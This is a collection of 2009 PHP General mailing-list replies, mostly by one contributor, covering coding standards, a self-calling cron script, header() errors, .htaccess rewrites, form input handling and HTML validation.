Re: [PHP] Proper code formatting
Hi Angus, please, read this topic http://www.igorescobar.com/blog/2009/02/03/coding-standards/ I speak a little bit about Coding Standards. Igor Escobar systems analyst & interface designer www . igorescobar . com On Mon, Mar 23, 2009 at 9:48 AM, Jason Pruim wrote: > George Larson wrote: > >> On Mon, Mar 23, 2009 at 8:23 AM, Shawn McKenzie > >wrote: >> >> >> >>> Bob McConnell wrote: >>> >>> >>>> From: Michael A. Peters >>>> >>>> >>>>> Angus Mann wrote: >>>>> >>>>> >>>>>> Hi all, I'm fairly new to PHP so I don't have too many bad habits >>>>>> >>>>>> >>>>> yet. >>>> >>>> >>>>> I'm keen to make my code easy to read for me in the future, and for >>>>>> others as well. >>>>>> >>>>>> Are there any rules or advice I can use for formatting (especially >>>>>> indenting) code? >>>>>> >>>>>> for example how best to format / indent this ? >>>>>> >>>>>> >>>>>> >>>>> To each his own. Whatever floats your canoe. >>>>> Just whatever you pick, stick to it throughout your code. >>>>> >>>>> >>>>>> I'm using "PHP designer 2008" which does syntax coloring but if it >>>>>> >>>>>> >>>>> has >>>> >>>> >>>>> something to automatically indent - I haven't found it yet. >>>>>> >>>>>> >>>>> It probably allows you to either set a specify a tab as a real tab or >>>>> >>>>> >>>> a >>>> >>>> >>>>> specified number of spaces. Auto-indenting - this isn't python, the >>>>> compiler doesn't enforce it's way, you follow the convention of the >>>>> project you are working on - so I suspect many php editors tailored to >>>>>php don't have an auto indent. >>>>> >>>>> I've never of course tried that specific product. I use bluefish, vi, >>>>> and emacs. >>>>> >>>>> >>>> To take this question a step further, is there a PHP best practices >>>> document available? I am looking for one that I can give to a new >>>> programmer and tell her "do it this way until you can explain to me why >>>> you shouldn't." >>>> >>>> Bob McConnell >>>> >>>> >>> There are various coding standards. There is one for PEAR, the Zend >>> Framework and most frameworks/large projects that take contributions >>> have them. Here's Zend: >>> >>> http://framework.zend.com/manual/en/coding-standard.html >>> >>> -- >>> Thanks! >>> -Shawn >>> http://www.spidean.com >>> >>> -- >>> PHP General Mailing List (http://www.php.net/) >>> To unsubscribe, visit: http://www.php.net/unsub.php >>> >>> >>> >>> >> >> Being a greenhorn, I too can benefit from this thread. >> >> Is that to say, Shawn, that you personally find this (Zend) standard as >> good >> or better than the rest? >> >> >> > I actually just went through this wit ha group of people that come from all > different levels and back grounds in regards to programing. Trying to decide > whether to use spaces, or tabs, short hand or long hand... It took quite a > bit of discussion before we arrived at an agreement... > > It really didn't matter what format we used as long as we stayed consistent > throughout the file. In other words, if you are going to edit a file and it > uses spaces instead of tabs, use spaces > > So absolutely, develop some standards if you are going to have multiple > coders working on it... But they don't have to be set by someone else... > > Personally though, I go for readability it may at times take longer to > write it out, but since we all type 500 words permit with 100% accuracy it > won't be a problem right? ;) > > And then when you go back to the code in 6 months, a year, 2 years... It's > still easily read able :) > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php > >
Re: [PHP] Re: Multithreading in PHP
Great Project, Lemos. When you are thinking in show more exemples? Regards, Igor Escobar systems analyst & interface designer www . igorescobar . com On Fri, Mar 20, 2009 at 3:04 AM, Manuel Lemos wrote: > > Hello Andrea, > > on 03/18/2009 06:07 AM Andrea Giammarchi said the following: > > If anybody interested, this is my "old" comet implementation in PHP: > > > http://webreflection.blogspot.com/2008/04/phomet-changes-name-so-welcome-phico.html > > Great! Any live examples page? > > > > P.S. Hi Manuel, ages I do not read you ( ages I do not post my classes in > phpclasses.org :-) ) > > Oh, yes, feel free to get back. Hopefully soon the PHPClasses site will > share ad revenue with the best contributors! ;-) > > > -- > > Regards, > Manuel Lemos > > Find and post PHP jobs > http://www.phpclasses.org/jobs/ > > PHP Classes - Free ready to use OOP components written in PHP > http://www.phpclasses.org/ > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php > >
Re: [PHP] today i found the best function I've ever seen
Do not try this at home...
Igor Escobar
systems analyst & interface designer
www . igorescobar . com
On Sat, Mar 21, 2009 at 7:23 AM, Virgilio Quilario <
virgilio.quila...@gmail.com> wrote:
> > if( !function_exists('clean_sql_term') )
> > {
> >function clean_sql_term($term) {
> >return $term;
> >}
> > }
> >
> > beautiful
> >
>
> hi Nathan,
>
> Nice find.
> You have found a very useful function.
> Here is how I use it to load needed PHP files that declares the function.
> if (!function_exists('clean_sql_term'))
> {
> require 'module.php';
> }
> clean_sql_term($term);
>
> Above code makes sure that the function is available.
> Really beautiful, though jurassic but useful.
>
> Cheers,
> Virgil
> http://www.jampmark.com
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
>
Re: [PHP] So called "PHP Expert"
Say this: "Okey man, where are the camera? it's not funny :D" Regards, Igor Escobar systems analyst & interface designer www . igorescobar . com On Sat, Mar 21, 2009 at 8:16 PM, abdulazeez alugo wrote: > > > > > > Date: Sat, 21 Mar 2009 10:54:56 -0400 > > From: danbr...@php.net > > To: tedd.sperl...@gmail.com > > CC: php-general@lists.php.net; rob...@interjinn.com > > Subject: Re: [PHP] So called "PHP Expert" > > > > On Sat, Mar 21, 2009 at 10:48, tedd wrote: > > > > > > Leave it to you to drop kick me when you have the chance. Here I was > trying > > > to say something prophetic and you made it pathetic. :-) > > > > Maybe philosophical? > > > > > Oh well, at least I take comfort in the fact that you'll probably not > live > > > to be as old as me. But if you do, just imagine how deep your ignorance > will > > > be. :-) > > > > Now *this* is prophetic and a harsh response to a virtual > > drop-kick. You guys play rough! > > > Oh! ref dan, I charge you to give them a yellow card or something. > > > > Alugo > > www.frangeovic.com > > _ > More than messages–check out the rest of the Windows Live™. > http://www.microsoft.com/windows/windowslive/
Re: [PHP] Proper code formatting
Im brazilian, and i understand your language, why you dont undertand my ? Regards, Igor Escobar systems analyst & interface designer www . igorescobar . com On Mon, Mar 23, 2009 at 11:10 AM, abdulazeez alugo wrote: > > > > Date: Mon, 23 Mar 2009 09:52:21 -0300 > > From: titiolin...@gmail.com > > To: pru...@gmail.com > > CC: george.g.lar...@gmail.com; nos...@mckenzies.net; > php-general@lists.php.net > > Subject: Re: [PHP] Proper code formatting > > > > Hi Angus, please, read this topic > > > > *http://www.igorescobar.com/blog/2009/02/03/coding-standards/ > * > > I speak a little bit about Coding Standards. > > And how did you expect us to understand the language your site is written > in? > > > -- > See all the ways you can stay connected to friends and > family<http://www.microsoft.com/windows/windowslive/default.aspx> >
Re: [PHP] Proper code formatting
Ok man, I'm sorry. This post i wrote in a few days ago in my native language. I dont have time enough to write in two languagesbut who knows in the future i can do it? I'm sorry about that man,but if you like the post anyway, try something like google translator. Regards, Igor Escobar systems analyst & interface designer www . igorescobar . com On Mon, Mar 23, 2009 at 11:33 AM, abdulazeez alugo wrote: > > > > Im brazilian, and i understand your language, why you dont undertand my ? > > > > Regards, > > Igor Escobar > > systems analyst & interface designer > > www . igorescobar . com > > > > > Well I guess the answer to that is obvious. I'm not brazilian and it would > be so generous of you > > to use the most acceptable International language in the world (English). > Though it's not my first language too but > > I use it as a mean to communicate with others. Atleast the essence of > communication is to be understood isn't it? > > NOTE: I speak other international languages too though but I haven't come > up to learning brazilian. Maybe you can > > help me with a simple tutorial on your language. > > > > Best regards. > > > > Alugo. > > _ > Drag n’ drop—Get easy photo sharing with Windows Live™ Photos. > > http://www.microsoft.com/windows/windowslive/products/photos.aspx
Re: [PHP] Proper code formatting
Thx ab. I'm did not to be rude ;) Have a nice day. Regards, Igor Escobar systems analyst & interface designer www . igorescobar . com On Mon, Mar 23, 2009 at 12:05 PM, abdulazeez alugo wrote: > > > Ok man, I'm sorry. > > This post i wrote in a few days ago in my native language. I dont have time > enough to write in two languagesbut who knows in the future i can do it? > > I'm sorry about that man,but if you like the post anyway, try something > like google translator. > > Regards,Igor Escobar > systems analyst & interface designer > www . igorescobar . com > > Well. Since it's not a common thing on this mailing list to hear someone > say he's sorry I readily accept your apology and I'll use the google > translator as you suggested. Come to think of it, arguments almost never end > well on this list (we just broke the record). Remember the one between > Almighty, self acclaimed Superstar Dan and Bot Jessica? then there was the > one between the client who later became the employer and Tedd. > > Cheers. > > _ > More than messages–check out the rest of the Windows Live™. > http://www.microsoft.com/windows/windowslive/ >
Re: [PHP] Problems with implode
Maybe you can reduce your code a little using the range();
it's just a sugestion...
Regards,
Igor Escobar
systems analyst & interface designer
www . igorescobar . com
On Wed, Mar 25, 2009 at 4:42 AM, Toke Herkild wrote:
> Okay, tested in the following manner:
>
> for ($i=12300;$i<12801;$i++){
> // List is filled with integers, in the correct charset from PHP
> $list[] = $i;
> }
> $pidList = implode(',', $list);
> mail('y...@email.dom, 'debug implode', var_export(array($pidList,
> $list),1));
>
> And I got the same error, which indicates that perhaps implode works just
> as it should but the representation is off. that in it self would be okay,
> but how then do we control that the query is actually correct ?
> If we cannot trust the debug output how then can we trust that the query
> is doing what it is supposed to do ?
>
> Regards,
> Toke
>
> Toke Herkild skrev:
>
> As stated before, packet size not the problem, data is delivered perfectly
>> from MySQL.
>> Problem seems to be when the result string is diplayed.
>> I'll try to do a test with a numeric array:
>> $list = array(12300..12800); and see what happens.
>>
>> regards,
>> Toke
>>
>> Andrea Giammarchi skrev:
>>
>>> What about MySQL max_allowed_packet setting? is it bigger than produced
>>> string?
>>>
>>> To: php-general@lists.php.net
>>>> Date: Tue, 24 Mar 2009 15:23:20 +0100
>>>> From: t...@ezl-data.dk
>>>> Subject: Re: [PHP] Problems with implode
>>>>
>>>> Per Jessen skrev:
>>>>
>>>>> Andrea Giammarchi wrote:
>>>>>
>>>>> Dunno why you guys started talk about utf-8 problems, he has a list of
>>>>>> ids which should contain only unsigned integers, otherwise I do not
>>>>>> get how that query could work with an implode(',', $whatever)
>>>>>>
>>>>> Very good point - maybe the OP has not yet tested his code that far?
>>>>> Is
>>>>> there a possibility that some of the id's are _not_ just plain integers
>>>>> made up of 0-9?
>>>>>
>>>>> /Per
>>>>>
>>>>> And exatly the reason I tried the following:
>>>> $list[] = $row['uid'];
>>>> $list[] = intval($row['uid']);
>>>> $list[] = mb_convert_encoding($row['uid'], 'iso-8859-1');
>>>> $list[] = mb_convert_encoding(intval($row['uid']), 'iso-8859-1');
>>>>
>>>> My best bet as for now:
>>>> It isn't implode there's the problem, but the length of the string
>>>>
>>>> --
>>>> PHP General Mailing List (http://www.php.net/)
>>>> To unsubscribe, visit: http://www.php.net/unsub.php
>>>>
>>>>
>>> _
>>> More than messages–check out the rest of the Windows Live™.
>>> http://www.microsoft.com/windows/windowslive/
>>>
>>
> As stated before, packet size not the problem, data is delivered perfectly
>> from MySQL.
>> Problem seems to be when the result string is diplayed.
>> I'll try to do a test with a numeric array:
>> $list = array(12300..12800); and see what happens.
>>
>> regards,
>> Toke
>>
>> Andrea Giammarchi skrev:
>>
>>> What about MySQL max_allowed_packet setting? is it bigger than produced
>>> string?
>>>
>>> To: php-general@lists.php.net
>>>> Date: Tue, 24 Mar 2009 15:23:20 +0100
>>>> From: t...@ezl-data.dk
>>>> Subject: Re: [PHP] Problems with implode
>>>>
>>>> Per Jessen skrev:
>>>>
>>>>> Andrea Giammarchi wrote:
>>>>>
>>>>> Dunno why you guys started talk about utf-8 problems, he has a list of
>>>>>> ids which should contain only unsigned integers, otherwise I do not
>>>>>> get how that query could work with an implode(',', $whatever)
>>>>>>
>>>>> Very good point - maybe the OP has not yet tested his code that far?
>>>>> Is
>>>>> there a possibility that some of the id's are _not_ just plain integers
>>>>> made up of 0-9?
>>>>>
>>>>> /Per
>>>>>
>>>>> And exatly the reason I tried the following:
>>>> $list[] = $row['uid'];
>>>> $list[] = intval($row['uid']);
>>>> $list[] = mb_convert_encoding($row['uid'], 'iso-8859-1');
>>>> $list[] = mb_convert_encoding(intval($row['uid']), 'iso-8859-1');
>>>>
>>>> My best bet as for now:
>>>> It isn't implode there's the problem, but the length of the string
>>>>
>>>> --
>>>> PHP General Mailing List (http://www.php.net/)
>>>> To unsubscribe, visit: http://www.php.net/unsub.php
>>>>
>>>>
>>> _
>>> More than messages–check out the rest of the Windows Live™.
>>> http://www.microsoft.com/windows/windowslive/
>>>
>>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
>
Re: [PHP] Fwd: A fatal error with php virtual cron
Maybe your problem are in the way you're calling your program by socket. If you show me this part of the code, maybe i can help you. Regards, Igor Escobar systems analyst & interface designer www . igorescobar . com On Wed, Mar 25, 2009 at 4:01 PM, אלמוג בקו wrote: > Hello, > There is some week than I trying to solve a critical error on my > VirtualCron > script. > > *First of all what is VirtualCron?:* > Virtual cron is script that`s call(http request) himself and doing the > "jobs" by the time(like a cron-jobs on linux, but this script build on php > and its make it independent by the Operation System and the access to the > server. [wordpress build something like that too]). > > *How my system works?:* > I have a page(cron.php) and I set this settings: > > ignore_user_abort(true); > set_time_limit(0); > sleep(1); //setting the base time unit > > I call to the script by socket connection with timout of 0.5s and with > non-blocking mode. > > Additionaly I have a log system that save a file with the error when they > happend. andI can "kill" the script by deleting "pid" file. > > *Well what`s happend?:* > The script works well when I tune a job to work more 5min from the running > time. > But from some reason the script stop to run after some seconds.. and the > system`s log dosent show any php`s error. > > BUT I found this error on my apache`s logs: > *[Wed Mar 25 10:25:19 2009] [error] [client 67.205.44.109] Premature end of > script headers: cron.php* > > > I hope thats someone know what I have to do.. > Thanks a lot, > Almog Baku, Israel. > > * > *** My script run on Shared DreamHost, with php5 & apache on linux *** > * > > > > * > צור איתי קשר:* <http://www.facebook.com/profile.php?id=682327963 > > >
Re: [PHP] Fwd: A fatal error with php virtual cron
Try the ignore_user_abort(true);
Regards,
Igor Escobar
systems analyst & interface designer
www . igorescobar . com
On Wed, Mar 25, 2009 at 4:21 PM, אלמוג בקו wrote:
> This is a part of the class:
>
> private function _request() {
> //URL information
> $url= "http://".$_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'];
> $url_info= parse_url($url);
>
> //Fixing port
> if(!isset($url_info['port'])) $url_info['port']=80;
>
>
> //Send "Cron-data"
> $data = array(
> 'jobs'=> base64_encode(var_export($this->jobs, true)),
> 'firstRun'=> base64_encode($this->firstRun)
> );
> $data=http_build_query($data);
>
> //Headers
> $headers = ""
> ."POST " . $url . " HTTP/1.0 \r\n"
> ."HOST: " . $url_info['host'] . ":" . $url_info['port'] . "
> \r\n"
> ."Content-type: application/x-www-form-urlencoded \r\n"
> ."Content-Length: " . strlen($data) . " \r\n"
> ."User-Agent: phpCron \r\n"
> ."Connection: close\r\n\r\n"
> .$data
> ;
>
> //Error vars
> $errstr= null;
> $errno = null;
>
> $fp = fsockopen($_SERVER['HTTP_HOST'], $_SERVER['SERVER_PORT'], $errno,
> $errstr, 0.5);
> if($fp) {
> @fwrite($fp, $headers);
> @stream_set_timeout($fp, 0.5);
> @stream_set_blocking($fp, 0);
> @fclose($fp);
> return true;
> } else {
> $this->error = array('socket'=>array('errstr'=>$errstr,
> 'errno'=>$errno));
> return false;
> }
> }
>
>
>
>
> *
> צור איתי קשר:*
> <http://www.facebook.com/profile.php?id=682327963>
>
>
> On Wed, Mar 25, 2009 at 9:17 PM, Igor Escobar wrote:
>
>> Maybe your problem are in the way you're calling your program by socket.
>>
>> If you show me this part of the code, maybe i can help you.
>>
>> Regards,
>>
>> Igor Escobar
>> systems analyst & interface designer
>> www . igorescobar . com
>>
>>
>>
>> On Wed, Mar 25, 2009 at 4:01 PM, אלמוג בקו wrote:
>>
>>> Hello,
>>> There is some week than I trying to solve a critical error on my
>>> VirtualCron
>>> script.
>>>
>>> *First of all what is VirtualCron?:*
>>> Virtual cron is script that`s call(http request) himself and doing the
>>> "jobs" by the time(like a cron-jobs on linux, but this script build on
>>> php
>>> and its make it independent by the Operation System and the access to the
>>> server. [wordpress build something like that too]).
>>>
>>> *How my system works?:*
>>> I have a page(cron.php) and I set this settings:
>>>
>>> ignore_user_abort(true);
>>> set_time_limit(0);
>>> sleep(1); //setting the base time unit
>>>
>>> I call to the script by socket connection with timout of 0.5s and with
>>> non-blocking mode.
>>>
>>> Additionaly I have a log system that save a file with the error when they
>>> happend. andI can "kill" the script by deleting "pid" file.
>>>
>>> *Well what`s happend?:*
>>> The script works well when I tune a job to work more 5min from the
>>> running
>>> time.
>>> But from some reason the script stop to run after some seconds.. and the
>>> system`s log dosent show any php`s error.
>>>
>>> BUT I found this error on my apache`s logs:
>>> *[Wed Mar 25 10:25:19 2009] [error] [client 67.205.44.109] Premature end
>>> of
>>> script headers: cron.php*
>>>
>>>
>>> I hope thats someone know what I have to do..
>>> Thanks a lot,
>>> Almog Baku, Israel.
>>>
>>> *
>>> *** My script run on Shared DreamHost, with php5 & apache on linux ***
>>> *
>>>
>>>
>>>
>>> *
>>> צור איתי קשר:* <
>>> http://www.facebook.com/profile.php?id=682327963>
>>>
>>
>>
>
Re: [PHP] Fwd: A fatal error with php virtual cron
Oh, Sorry, I had not seen.
Well, I don't see anything wrong in your code, but maybe...if you find in
your apache config file, you can found for something similar to your problem
...
Sorry can't help you.
Regards,
Igor Escobar
systems analyst & interface designer
www . igorescobar . com
On Wed, Mar 25, 2009 at 4:40 PM, אלמוג בקו wrote:
> I already wrote that..
>
> ignore_user_abort(true);
> set_time_limit(0);
> sleep(1);
>
>
>
>
> *
> צור איתי קשר:*
> <http://www.facebook.com/profile.php?id=682327963>
>
>
> On Wed, Mar 25, 2009 at 9:38 PM, Igor Escobar wrote:
>
>> Try the ignore_user_abort(true);
>>
>> Regards,
>> Igor Escobar
>> systems analyst & interface designer
>> www . igorescobar . com
>>
>>
>>
>> On Wed, Mar 25, 2009 at 4:21 PM, אלמוג בקו wrote:
>>
>>> This is a part of the class:
>>>
>>> private function _request() {
>>> //URL information
>>> $url= "http://".$_SERVER['HTTP_HOST'] .
>>> $_SERVER['PHP_SELF'];
>>> $url_info= parse_url($url);
>>>
>>> //Fixing port
>>> if(!isset($url_info['port'])) $url_info['port']=80;
>>>
>>>
>>> //Send "Cron-data"
>>> $data = array(
>>> 'jobs'=> base64_encode(var_export($this->jobs, true)),
>>> 'firstRun'=> base64_encode($this->firstRun)
>>> );
>>> $data=http_build_query($data);
>>>
>>> //Headers
>>> $headers = ""
>>> ."POST " . $url . " HTTP/1.0 \r\n"
>>> ."HOST: " . $url_info['host'] . ":" . $url_info['port'] .
>>> " \r\n"
>>> ."Content-type: application/x-www-form-urlencoded \r\n"
>>> ."Content-Length: " . strlen($data) . " \r\n"
>>> ."User-Agent: phpCron \r\n"
>>> ."Connection: close\r\n\r\n"
>>> .$data
>>> ;
>>>
>>> //Error vars
>>> $errstr= null;
>>> $errno = null;
>>>
>>> $fp = fsockopen($_SERVER['HTTP_HOST'], $_SERVER['SERVER_PORT'],
>>> $errno, $errstr, 0.5);
>>> if($fp) {
>>> @fwrite($fp, $headers);
>>> @stream_set_timeout($fp, 0.5);
>>> @stream_set_blocking($fp, 0);
>>> @fclose($fp);
>>> return true;
>>> } else {
>>> $this->error = array('socket'=>array('errstr'=>$errstr,
>>> 'errno'=>$errno));
>>> return false;
>>> }
>>> }
>>>
>>>
>>>
>>>
>>> *
>>> צור איתי קשר:*
>>> <http://www.facebook.com/profile.php?id=682327963>
>>>
>>>
>>> On Wed, Mar 25, 2009 at 9:17 PM, Igor Escobar wrote:
>>>
>>>> Maybe your problem are in the way you're calling your program by socket.
>>>>
>>>> If you show me this part of the code, maybe i can help you.
>>>>
>>>> Regards,
>>>>
>>>> Igor Escobar
>>>> systems analyst & interface designer
>>>> www . igorescobar . com
>>>>
>>>>
>>>>
>>>> On Wed, Mar 25, 2009 at 4:01 PM, אלמוג בקו wrote:
>>>>
>>>>> Hello,
>>>>> There is some week than I trying to solve a critical error on my
>>>>> VirtualCron
>>>>> script.
>>>>>
>>>>> *First of all what is VirtualCron?:*
>>>>> Virtual cron is script that`s call(http request) himself and doing the
>>>>> "jobs" by the time(like a cron-jobs on linux, but this script build on
>>>>> php
>>>>> and its make it independent by the Operation System and the access to
>>>>> the
>>>>> server. [wordpress build something like that too]).
>>>>>
>>>>> *How my system works?:*
>>>>> I have a page(cron.php) and I set this settings:
>>>>>
>>>>> ignore_user_abort(true);
>>>>> set_time_limit(0);
>>>>> sleep(1); //setting the base time unit
>>>>>
>>>>> I call to the script by socket connection with timout of 0.5s and with
>>>>> non-blocking mode.
>>>>>
>>>>> Additionaly I have a log system that save a file with the error when
>>>>> they
>>>>> happend. andI can "kill" the script by deleting "pid" file.
>>>>>
>>>>> *Well what`s happend?:*
>>>>> The script works well when I tune a job to work more 5min from the
>>>>> running
>>>>> time.
>>>>> But from some reason the script stop to run after some seconds.. and
>>>>> the
>>>>> system`s log dosent show any php`s error.
>>>>>
>>>>> BUT I found this error on my apache`s logs:
>>>>> *[Wed Mar 25 10:25:19 2009] [error] [client 67.205.44.109] Premature
>>>>> end of
>>>>> script headers: cron.php*
>>>>>
>>>>>
>>>>> I hope thats someone know what I have to do..
>>>>> Thanks a lot,
>>>>> Almog Baku, Israel.
>>>>>
>>>>> *
>>>>> *** My script run on Shared DreamHost, with php5 & apache on linux ***
>>>>> *
>>>>>
>>>>>
>>>>>
>>>>> *
>>>>> צור איתי קשר:* <
>>>>> http://www.facebook.com/profile.php?id=682327963>
>>>>>
>>>>
>>>>
>>>
>>
>
Re: [PHP] time() TIMER in seconds or just numbers
When someone does that, it means the execution time between $t1 and $t2...
Att,
Igor Escobar
systems analyst & interface designer
www . igorescobar . com
On Mon, Mar 30, 2009 at 7:38 AM, Richard Heyes wrote:
> 2009/3/30 Andrew Williams :
> > what does time();
> >
> > $t1 = time();
> >
> > {
> >
> > do something
> > }
> > $t2 = time();
> >
> > $end_time = $t2 - $t1;
> > echo $end_time;
> >
> > what does $end_time represent?
>
> $end_time is not a great name for it: it's the time (number of
> seconds) it took to go from $t1 to $t2. $duration might be better.
>
> > how do you determine the next 5 mins?
>
> Eh? time() + 300 is five minutes from now.
>
> --
> Richard Heyes
>
> HTML5 Canvas graphing for Firefox, Chrome, Opera and Safari:
> http://www.rgraph.net (Updated March 14th)
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
>
Re: [PHP] foreach and form submission.
Try this...
$_POST = array_map('stri_tags', $_POST);
Igor Escobar
systems analyst & interface designer
www . igorescobar . com
On Sat, Mar 28, 2009 at 6:21 PM, Angus Mann wrote:
> Thanks Ashley...that did the trick.
> After reading about the limitations of strip_tags I decided to just replace
> the bad bits as below...
> It still uses your "foreach" suggestion but replaces "<" and ">" with "("
> and ")" instead of stripping tags.
>
> I think I will extend the good and bad arrays to deal with magic quotes
> also !
>
> $bad = array('<','<','<', '>', '>', '>');
> $good = array('(', '(', '(', ')', ')', ')');
> foreach ($_POST as $key => $value) {
> $_POST[$key] = str_ireplace($bad, $good, $value);
>
> }
>
>
>
>
>
> I'd do something like this, so as to preserve the original post data
>> array:
>>
>> $data = Array();
>> foreach($_POST as $key => $value)
>> {
>> $data[$key] = strip_tags($value);
>> }
>>
>> Note that strip_tags() will not be able to decently clean up messy code
>> (i.e. code where the opening or closing tags themselves aren't formed
>> properly)
>>
>>
>> Ash
>> www.ashleysheridan.co.uk
>>
>>
>>
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
>
Re: [PHP] Security Support
I agree with you Daniel Regards, Igor Escobar systems analyst & interface designer www . igorescobar . com On Mon, Mar 30, 2009 at 10:58 AM, Daniel Brown wrote: > On Sun, Mar 29, 2009 at 22:07, abdulazeez alugo > wrote: > >> Yea, dude, well me GED says I kin git it dun wit less wastid time. > >> > >> -- > > No be only una get pidgin English ooo. Me sef fit do am sharp sharp no be > say them say. > > Is there any particular reason you guys totally trashed this > thread? It's fine if you don't want to apply, but please don't go out > of your way to try to make someone with a legitimate and > properly-formatted request look like a moron because it backfires > and reflects poorly on your own professionalism. > > -- > > daniel.br...@parasane.net || danbr...@php.net > http://www.parasane.net/ || http://www.pilotpig.net/ > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php > >
Re: [PHP] time() TIMER in seconds or just numbers
Okey, but you understand the purpouse of it? Igor Escobar systems analyst & interface designer www . igorescobar . com On Mon, Mar 30, 2009 at 3:42 PM, haliphax wrote: > On Mon, Mar 30, 2009 at 11:37 AM, Igor Escobar > wrote: > > The people use that to measure performance. > > > > If you're intersted about that read > > > http://www.igorescobar.com/blog/2009/03/05/benchmarking-de-desempenho-no-php/ > > (in portuguese, sorry) > > > > Regards, > > Igor Escobar > > > > On Mon, Mar 30, 2009 at 1:05 PM, haliphax wrote: > >> > >> On Mon, Mar 30, 2009 at 10:47 AM, Richard Heyes > wrote: > >> >> When someone does that, it means the execution time between $t1 and > >> >> $t2... > >> > > >> > Is that for my benefit? Believe it or not, I do know the arcane art of > >> > subtraction... > >> > >> I would subtract more often, but sacrificial farm animals and black > >> candles are so hard to come by these days... > > Oh, I'm fully aware of what it's for. FYI, microtime() is probably > more appropriate, since 1 full second in computer terms is a loong > time. > > ...and I don't speak a lick of Portuguese. > > > -- > // Todd >
[PHP] Problem with header();
Hi guys, probably everybody goes think: "its the same problem ever" HTML before header() functions ... but it is not. I has working on a project and this are a running in "Windows" (shame on me). Recently i migrate to *Ubuntu *and some problems occurred and that specifically i can't understand WHY this rappening "Warning: Cannot modify *header* information - headers already sent by" On my web server on the internet it's OK On my local web server on my work it's OK On my loca web server on my notebook it's the problem. This error occurs only in my notebook (recently that I migrate to linux and it does not already). Please, someone have any idea what the fuck is happening? Regards, Igor Escobar systems analyst & interface designer www . igorescobar . com
Re: [PHP] Problem with header();
I don't had the oportunity to test it yet, but today i will. Today i will make two tests: - Save the files without BOM. - If i dont have success i will disable the output buffering. Thanks to everybody for all support. Regards, Igor Escobar systems analyst & interface designer www . igorescobar . com On Tue, Mar 31, 2009 at 12:39 AM, Phpster wrote: > Output buffering turned off? > > Bastien > > Sent from my iPod > > > On Mar 30, 2009, at 15:03, Igor Escobar wrote: > > Hi guys, probably everybody goes think: "its the same problem ever" HTML >> before header() functions ... but it is not. >> >> I has working on a project and this are a running in "Windows" (shame on >> me). >> Recently i migrate to *Ubuntu *and some problems occurred and that >> specifically i can't understand WHY this rappening >> >> "Warning: Cannot modify *header* information - headers already sent by" >> >> On my web server on the internet it's OK >> On my local web server on my work it's OK >> On my loca web server on my notebook it's the problem. >> >> This error occurs only in my notebook (recently that I migrate to linux >> and >> it does not already). >> >> Please, someone have any idea what the fuck is happening? >> >> Regards, >> Igor Escobar >> systems analyst & interface designer >> www . igorescobar . com >> >
[PHP] Error on .htaccess
In all the servers i had tested my system i dont have any problem, but in
this server the apache are displaying to me the error 500 "Internal Server
Error".
Someone can say tome what is wront with my .htaccess?
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond $1 !-d
RewriteRule ^(.*)$ load.php?$1 [QSA,L]
This server are running PHP 5.2.9 and Apache 1.3.41 (Unix).
Regards,
Igor Escobar
systems analyst & interface designer
www . igorescobar . com
Re: [PHP] W3C Validator and Post Arrays
Put [] in the name attribute, but in ID must be unique. Regards, Igor Escobar systems analyst & interface designer www . igorescobar . com On Thu, Apr 2, 2009 at 8:11 AM, Peter Ford wrote: > Peter Ford wrote: > > Michael A. Peters wrote: > >> Shaun Thornburgh wrote: > >>> Hi, > >>> > >>> We are getting errors when trying to vaildate our HTML due to the [ > >>> character when using Post Arrays: > >>> > >>> Line 173, Column 65: > >>> character "[" is not allowed in the value of attribute "id" > >>> > >>> …e="filters[calling_url]" id="filters[calling_url]" > >>> value="categories-bulk-ear > >>> > >>> Does anyone know of a way around this? > >>> > >>> Thanks > >> Don't use [] in an ID - it doesn't belong there. > >> If you are not using the ID for a hook, just drop it - the ID doesn't > >> need to be there. > >> > >> The name attribute is where you want the [] to post an array, ID does > >> not get sent in a post. > > > > The ID of any element should be unique in a HTML document - if you need > an ID > > for each of the inputs then you'll have to generate a unique one for > each. > > > > To the rest of the list: I'm not too happy about having stuff inside the > [] > > either - is that some syntax I've missed or is it just wrong? > > > > Oooh, I've just looked it up - that *is* neat! > > -- > Peter Ford phone: 01580 89 > Developer fax: 01580 893399 > Justcroft International Ltd., Staplehurst, Kent > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php > >
Re: [PHP] Oracle's dump to MySQL
I'm in the Oracle/MySQL E-mail List ? Regards, Igor Escobar systems analyst & interface designer www . igorescobar . com On Thu, Apr 2, 2009 at 6:26 AM, 9el wrote: > I found this command from one guy for importing Oracle's dump to MySQL > > Shell> mysql -uroot db_name -vvf < oracle_dump.dmp > > But, v is for verbose and f is for force continuation. > > Anyone worked with Oracle and MySQL? >
Re: [PHP] XML data extraction
@Jessen I read your answer and... You have any article speaking about that you are saying? Regards, Igor Escobar systems analyst & interface designer www . igorescobar . com On Thu, Apr 2, 2009 at 8:38 AM, Per Jessen wrote: > Andrew Williams wrote: > > > Best All, > > > > How can you best and accurately extract XLM data to DB table. e.g.: > > > > Use XSLT to generate SQL INSERT statements. > > > /Per > > -- > Per Jessen, Zürich (11.3°C) > > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php > >
Re: [PHP] Button id's - firefox and IE different ?
If you don't want change your form, do some function in Javascript witch
control the last button you clicked.
Delete
Delete
Delete
I wanna make a advice to you learn more about HTML and Web Standards...
Don't use button type... use "input" type...
Your javascript (using jQuery) sems like this
$("input[name='btid']").click(function() {
$('#last_buttom').attr('value', $(this).val());
});
And then you submit your form or something, the input "last_buttom" are with
the value of the buttom you has clicked at last time.
Regards,
Igor Escobar
systems analyst & interface designer
www . igorescobar . com
On Thu, Apr 2, 2009 at 8:29 AM, Phpster wrote:
